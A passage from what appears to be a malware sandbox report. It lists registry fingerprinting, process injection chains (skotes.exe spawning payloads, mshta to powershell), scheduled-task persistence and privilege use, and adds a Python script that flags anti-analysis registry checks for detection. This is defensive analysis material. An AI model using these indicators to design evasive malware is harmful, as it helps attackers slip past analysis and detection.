Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
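The Wine, NLS\Language, CentralProcessor and BIOS tables above record one behaviour from four angles: a freshly dropped binary fingerprinting its host before it does anything else. The tables also show why a per-key alert is noisy: chrome.exe and msedge.exe read the same BIOS and CPU values, and cmd.exe, schtasks.exe and powershell.exe open NLS\Language as part of ordinary startup. The Python below is an added example, not part of the sandbox output: it groups the report's own "Key opened" / "Key value queried" rows per process, counts how many distinct fingerprint checks each process combined, and flags only processes that run from outside an install path and perform two or more. Sample rows are copied from the tables above; the ATT&CK mapping and the trusted-path list are my assumptions.

```python
import re
from collections import defaultdict

# Constructed sample: "Key opened" / "Key value queried" rows in the shape of the
# Wine, language, processor and BIOS tables above. Report text, not a live registry.
SAMPLE_EVENTS = [
    r'Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A',
    r'Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A',
    r'Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A',
    r'Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe N/A',
    r'Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe N/A',
    r'Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe N/A',
    r'Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A',
    r'Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A',
]

# One report row: Key opened|value queried <key> <process> N/A
EVENT_RE = re.compile(
    r'^Key (?:opened|value queried) (?P<key>\\REGISTRY\\\S.*?) (?P<proc>[A-Za-z]:\\.+?) N/A$'
)

# Registry locations the report's signatures key on, the check each implements,
# and an assumed ATT&CK technique id.
CHECKS = [
    ("wine",   r"\\software\\wine$",                                "T1497.001"),  # emulator check
    ("locale", r"\\control\\nls\\language",                          "T1614.001"),  # install language
    ("bios",   r"\\hardware\\description\\system\\bios",             "T1082"),      # VM vendor strings
    ("cpu",    r"\\hardware\\description\\system\\centralprocessor", "T1082"),      # CPU name / MHz
]

# Path-based trust is a heuristic: a process that was injected into (see the
# WriteProcessMemory table) looks trusted here, so correlate rather than discard.
TRUSTED_DIRS = ("c:\\program files", "c:\\windows\\")


def classify_event(line: str):
    """(process, check_name, technique) for one row, or None if it is not a key-access row."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    key = m["key"].lower()
    for name, pattern, technique in CHECKS:
        if re.search(pattern, key):
            return m["proc"], name, technique
    return m["proc"], "other", None


def build_profiles(lines):
    """Map each process to the set of distinct fingerprint checks it performed."""
    profiles = defaultdict(set)
    for line in lines:
        rec = classify_event(line)
        if rec and rec[1] != "other":
            profiles[rec[0]].add(rec[1])
    return dict(profiles)


def flag_anti_analysis(profiles, min_checks=2):
    """Processes outside trusted install paths that combine >= min_checks distinct checks."""
    flagged = []
    for proc, checks in profiles.items():
        if not proc.lower().startswith(TRUSTED_DIRS) and len(checks) >= min_checks:
            flagged.append(proc)
    return sorted(flagged)


if __name__ == "__main__":
    profiles = build_profiles(SAMPLE_EVENTS)
    for proc, checks in profiles.items():
        print(f"{proc}: {sorted(checks)}")
    print("anti-analysis profile:", flag_anti_analysis(profiles))
```

On the sample rows this flags skotes.exe (Wine plus language) and 759b6f5ccf.exe (Wine plus CPU) and ignores chrome.exe and cmd.exe. The trusted-path shortcut has a blind spot visible in this very report: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe appears in the language-discovery table doing the same NLS\Language read as the dropped binaries, so a process that passes the path check but shows up as a target in the WriteProcessMemory table should be treated as untrusted for this purpose.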

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133848770725900965" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3680 wrote to memory of 3652 N/A C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 3680 wrote to memory of 3652 N/A C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 3680 wrote to memory of 3652 N/A C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
PID 3652 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe
PID 3652 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe
PID 3652 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 3652 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 3652 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 2672 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 2672 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 2672 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 2672 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 2672 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 2672 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 2672 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 2672 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 2672 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
PID 3652 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
PID 3652 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
PID 3652 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
PID 3652 wrote to memory of 720 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe
PID 3652 wrote to memory of 720 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe
PID 3652 wrote to memory of 720 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe
PID 720 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe C:\Windows\SysWOW64\cmd.exe
PID 720 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe C:\Windows\SysWOW64\cmd.exe
PID 720 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe C:\Windows\SysWOW64\cmd.exe
PID 720 wrote to memory of 4108 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe C:\Windows\SysWOW64\mshta.exe
PID 720 wrote to memory of 4108 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe C:\Windows\SysWOW64\mshta.exe
PID 720 wrote to memory of 4108 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe C:\Windows\SysWOW64\mshta.exe
PID 4972 wrote to memory of 3724 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4972 wrote to memory of 3724 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4972 wrote to memory of 3724 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4108 wrote to memory of 2036 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4108 wrote to memory of 2036 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4108 wrote to memory of 2036 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4420 wrote to memory of 3848 N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4420 wrote to memory of 3848 N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 3268 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 3268 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3848 wrote to memory of 4444 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
